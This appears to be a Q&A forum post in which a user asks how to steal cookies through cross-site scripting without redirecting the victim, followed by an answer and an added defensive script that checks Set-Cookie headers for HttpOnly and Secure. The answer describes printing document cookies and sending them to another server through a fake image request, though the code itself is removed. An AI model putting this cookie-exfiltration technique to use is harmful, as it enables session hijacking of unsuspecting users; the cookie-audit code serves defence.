Can I use the XSS Steal Cookie option without it redirecting me to another page?

Asked by Aalapprabhakaran in SQL Server, asked on Dec 28, 2021

Is it possible for me to steal the XSS cookies without getting redirected to another page? 

A blog had the following paragraph related to XSS: Cross-site scripting, often abbreviated as XSS, is a type of attack in which malicious scripts are injected into websites and web applications for the purpose of running on the end user's device. During this process, unsanitized or unvalidated inputs (user-entered data) are used to change outputs.

Answered by Amanda Hawes

To use the XSS steal cookie option without getting redirected to another page, you have to get full control of the JavaScript being written to the page; then you could just do:


[removed]('cookie: ' + [removed])
If you want it sent to another server, you could include it in a non-existent image:
[removed]('')
The key here is whether you can output arbitrary JavaScript or whether you're limited in the kind of JavaScript you can get executed. Though if you're limited in what can be output, you could use more advanced methods of getting your custom code to execute, which are a bit out of scope of the question.
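
A defensive counterpart to the answer above, as an added example that is not part of the original post: script running in a page can only read cookies that lack the `HttpOnly` attribute, so this audits `Set-Cookie` header values for that attribute (and for `Secure`). The function names and the sample headers are constructed for illustration.

```javascript
// Added example: audit Set-Cookie header values for cookies that page script
// can read. All header values below are constructed samples.

// Parse one Set-Cookie header value into { name, attrs }.
// Attribute names are lowercased because they are case-insensitive.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || '';
  const eq = first.indexOf('=');            // the value itself may contain '='
  const name = eq === -1 ? first : first.slice(0, eq).trim();
  const attrs = {};
  for (const p of parts) {
    const i = p.indexOf('=');
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return { name, attrs };
}

// Report, per cookie, which protective attributes are missing.
function auditCookies(headers) {
  return headers.map((h) => {
    const { name, attrs } = parseSetCookie(h);
    const issues = [];
    if (!attrs.httponly) issues.push('readable by script (no HttpOnly)');
    if (!attrs.secure) issues.push('sent over plain HTTP (no Secure)');
    return { name, issues };
  });
}

// Names of the cookies that injected script would be able to read.
function scriptReadable(headers) {
  return auditCookies(headers)
    .filter((c) => c.issues.some((i) => i.startsWith('readable by script')))
    .map((c) => c.name);
}

// Constructed sample input.
const sampleHeaders = [
  'sessionid=abc123; Path=/',
  'sessionid=abc123; Path=/; HTTPONLY; Secure; SameSite=Lax',
  'theme=dark; Path=/; Secure',
];

console.log(auditCookies(sampleHeaders));
```
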
